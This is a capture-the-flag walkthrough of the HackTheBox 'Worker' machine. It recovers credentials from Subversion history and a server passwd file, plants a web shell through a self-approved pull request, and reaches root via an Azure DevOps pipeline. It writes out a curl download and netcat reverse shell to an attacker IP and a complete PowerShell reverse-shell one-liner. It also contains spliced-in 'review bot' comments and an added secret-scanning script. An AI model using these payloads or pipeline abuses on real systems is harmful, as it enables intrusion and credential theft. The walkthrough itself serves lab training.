Worker — HackTheBox
TL;DR
This box walks through some of the repercussions of an attacker gaining a foothold in your organization, and how they would compromise your development infrastructure (source control and CI/CD) to pivot or gain persistence.
Foothold Reconnaissance
For the initial recon, start with an Nmap service scan:
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3690/tcp open svnserve Subversion
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
This gives a couple of things to explore. The website on port 80 is just the default IIS page. Next up is the svnserve endpoint, which serves a Subversion repository (a version control system similar to Git). The next step is to pull the repository from this endpoint to see where it leads.
svn checkout svn://worker.htb
The change logs will reveal credentials that will lead to the next pivot.
kali@kali:~/HTB/Worker$ svn log
--------------------------------------------------------------------
r5 | nathen | 2020-06-20 09:52:00 -0400 (Sat, 20 Jun 2020) | 1 line

Added note that repo has been migrated
--------------------------------------------------------------------
r4 | nathen | 2020-06-20 09:50:20 -0400 (Sat, 20 Jun 2020) | 1 line

Moving this repo to our new devops server which will handle the deployment for us
--------------------------------------------------------------------
r3 | nathen | 2020-06-20 09:46:19 -0400 (Sat, 20 Jun 2020) | 1 line

-
--------------------------------------------------------------------
r2 | nathen | 2020-06-20 09:45:16 -0400 (Sat, 20 Jun 2020) | 1 line

Added deployment script
--------------------------------------------------------------------
r1 | nathen | 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020) | 1 line

First version
--------------------------------------------------------------------

kali@kali:~/HTB/Worker$ svn diff -r 1:2
Index: deploy.ps1
===================================================================
--- deploy.ps1 (nonexistent)
+++ deploy.ps1 (revision 2)
@@ -0,0 +1,6 @@
+$user = "nathen"
+$plain = "wendel98"
+$pwd = ($plain | ConvertTo-SecureString)
+$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
+$args = "Copy-Site.ps1"
+Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")

kali@kali:~/HTB/Worker$ svn diff -r 4:5
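Review bot: deploy.ps1 (the r2 hunk above) commits the plaintext password in `$plain` and only wraps it in a SecureString at runtime, so anyone with read access to the repository history, or to the svnserve endpoint, gets the credential; the script should read it from an environment variable or a secret store and the value should never be in version control. As written, `$plain | ConvertTo-SecureString` without `-AsPlainText -Force` also expects an encrypted standard string rather than plain text and will fail. Minor: `$args` and `$pwd` shadow PowerShell automatic variables and should be renamed.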
Index: moved.txt
===================================================================
--- moved.txt (nonexistent)
+++ moved.txt (revision 5)
@@ -0,0 +1,5 @@
+This repository has been migrated and will no longer be maintaned here.
+You can find the latest version at: http://devops.worker.htb
+
+// The Worker team :)
+
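Review bot: "maintaned" on the first added line of moved.txt should be "maintained". More important, announcing the move leaves this repository, including the password committed in deploy.ps1 at r2, readable to anyone who can reach svnserve; the migration should be paired with rotating that credential and retiring or locking down the old repository.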
The results reveal a subdomain of interest, devops.worker.htb, and a set of credentials. This subdomain hosts a locally deployed Azure DevOps portal, and the credentials can be used to log in as "nathen".
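How a defender would catch this before an attacker does, as an added example that is not part of the original writeup: walk every revision of the Subversion working copy with `svn diff -c` and flag added lines that look like committed credentials, including the deploy.ps1 pattern above and svnserve passwd entries. It assumes the `svn` client is installed and the script is run from inside the checked-out working copy; SAMPLE_DIFF is constructed.

```python
import re
import subprocess

# Constructed sample shaped like the deploy.ps1 revision above (placeholder value).
SAMPLE_DIFF = """Index: deploy.ps1
===================================================================
--- deploy.ps1\t(nonexistent)
+++ deploy.ps1\t(revision 2)
@@ -0,0 +1,3 @@
+$user = "nathen"
+$plain = "PLACEHOLDER-NOT-A-REAL-PASSWORD"
+$pwd = ($plain | ConvertTo-SecureString)
"""

SECRET_PATTERNS = [
    # "$plain = "..."" style assignments to password-like variables
    re.compile(r'\$\w*(pass|pwd|plain|secret)\w*\s*=\s*["\'][^"\']+["\']', re.I),
    # a SecureString built inside the script means the plaintext sits next to it
    re.compile(r'ConvertTo-SecureString', re.I),
    re.compile(r'(password|passwd|secret|token)\s*[=:]\s*\S+', re.I),
]
PASSWD_ENTRY = re.compile(r'^\w+\s*=\s*\S+$')  # svnserve "[users]" entries

def find_secrets(diff_text):
    """Return (path, added_line) pairs for '+' lines that look like secrets.
    '-' lines are ignored: deleting a secret later does not remove it from
    history, which is why every revision is scanned, not just HEAD."""
    hits, path = [], None
    for line in diff_text.splitlines():
        if line.startswith('Index: '):
            path = line[len('Index: '):].strip()
        elif line.startswith('+') and not line.startswith('+++'):
            added = line[1:]
            if any(p.search(added) for p in SECRET_PATTERNS) or (
                    path and path.endswith('passwd') and PASSWD_ENTRY.match(added)):
                hits.append((path, added))
    return hits

def revisions_in_log(log_text):
    # `svn log -q` prints one "rN | author | date" header per revision
    return sorted(int(m) for m in re.findall(r'^r(\d+) \|', log_text, re.M))

def scan_working_copy(wc='.'):
    # Map revision number -> hits, running `svn diff -c REV` for every revision.
    svn = lambda *a: subprocess.run(['svn', *a, wc], capture_output=True, text=True, check=True).stdout
    results = {}
    for rev in revisions_in_log(svn('log', '-q')):
        if hits := find_secrets(svn('diff', '-c', str(rev))):
            results[rev] = hits
    return results
```

Run `scan_working_copy()` inside a checkout; a hit in any revision means the value must be rotated even if the current HEAD no longer contains it.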
There are multiple repos in this portal under the "SmartHotel360" project.
If you poke around you will land on the build pipeline, from which you can see that each project is deployed to a subdomain that corresponds to the repository name, for example "alpha.worker.htb".
When you access this page, the response headers reveal that it is an ASP.NET project.
Foothold
Since you now have write access to the repo, the goal is to drop a web shell into it and have it built and deployed. If you are on Kali, a copy of such a shell already exists at "/usr/share/seclists/Web-Shells/FuzzDB/cmd.aspx".
You can create this file from the UI.
Create a PR and then merge it to the main branch. When creating a PR, a work item has to be attached; if you start typing, a suggestion will come up that you can select.
You can self-approve the PR and then complete it. Completing it triggers a build and deployment.
Once deployed, navigate to "/cmd.aspx" (the name of the shell file you created).
Through this shell you can run commands to fetch netcat onto the box and then start a reverse shell.
cd \Windows\Temp\ && curl -O http://10.10.14.26:8000/nc64.exe
\Windows\Temp\nc64.exe 10.10.14.26 1337 -e cmd.exe
This box was running a script that resets the repository to its initial state every 10 minutes, so you will have to be quick. This will not happen in real life, but in this case I am guessing it was done so that someone else will not stumble on your shell file.
User Reconnaissance
Once on the box you will realize that you cannot really do much, since you are the user "defaultapppool".
kali@kali:~/HTB/Worker$ listen 1337
listening on [any] 1337 ...
connect to [10.10.14.26] from (UNKNOWN) [10.10.10.203] 59604
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>cd C:\Users
cd C:\Users

C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 32D6-9041

Directory of C:\Users

2020-07-07 16:53 <DIR> .
2020-07-07 16:53 <DIR> ..
2020-03-28 14:59 <DIR> .NET v4.5
2020-03-28 14:59 <DIR> .NET v4.5 Classic
2020-08-17 23:33 <DIR> Administrator
2020-03-28 14:01 <DIR> Public
2020-07-22 00:11 <DIR> restorer
2020-07-08 18:22 <DIR> robisl
0 File(s) 0 bytes
8 Dir(s) 10 303 868 928 bytes free

C:\Users>cd robisl
cd robisl
Access is denied.

C:\Users>whoami
whoami
iis apppool\defaultapppool
You will need credentials for the user "robisl". Digging around, you will discover the file `W:\svnrepos\www\conf\passwd`:
type W:\svnrepos\www\conf\passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.

[users]
...
robisl = wolves11
...
User Flag
With these credentials you can use Evil-WinRM to connect as "robisl" and grab the user flag.
kali@kali:~/HTB/Tools$ evil-winrm -i 10.10.10.203 -u robisl -p wolves11

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\robisl\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\robisl\Desktop> dir

    Directory: C:\Users\robisl\Desktop

Mode   LastWriteTime       Length Name
----   -------------       ------ ----
-ar--- 12/6/2020 4:21 AM       34 user.txt

*Evil-WinRM* PS C:\Users\robisl\Desktop>
Root Reconnaissance
Since we now have credentials for the user "robisl", the next step is to explore what he can do in the Azure DevOps portal.
This user can create a pipeline, and a pipeline can include PowerShell code. This is what will be leveraged to get the root flag.
Root Flag
To create a pipeline, go to the Pipelines blade and click "New pipeline". Then select "Azure Repos Git" followed by the actual repository. The next step is to select a project type that fits the pipeline you are creating; it does not really matter what you select here, as it will be changed in the next step. When presented with the YAML in the final step, replace the "steps" section with the following, which runs a PowerShell task.
- task: PowerShell@2
  timeoutInMinutes: 10
  inputs:
    targetType: 'inline'
    script: "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.26',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Save and run.
When the PowerShell task executes, the reverse shell connects back.
The shell I got was not very stable and hence I had a limited time to go in and get the flag.
kali@kali:~/HTB/Worker$ listen 4443
listening on [any] 4443 ...
connect to [10.10.14.26] from (UNKNOWN) [10.10.10.203] 51469

PS W:\agents\agent11\_work\14\s> cd C:
PS C:\> cd Users\Administrator
PS C:\Users\Administrator> cd Desktop
PS C:\Users\Administrator\Desktop> ls

    Directory: C:\Users\Administrator\Desktop

Mode   LastWriteTime       Length Name
----   -------------       ------ ----
-ar--- 2020-12-07 18:06        34 root.txt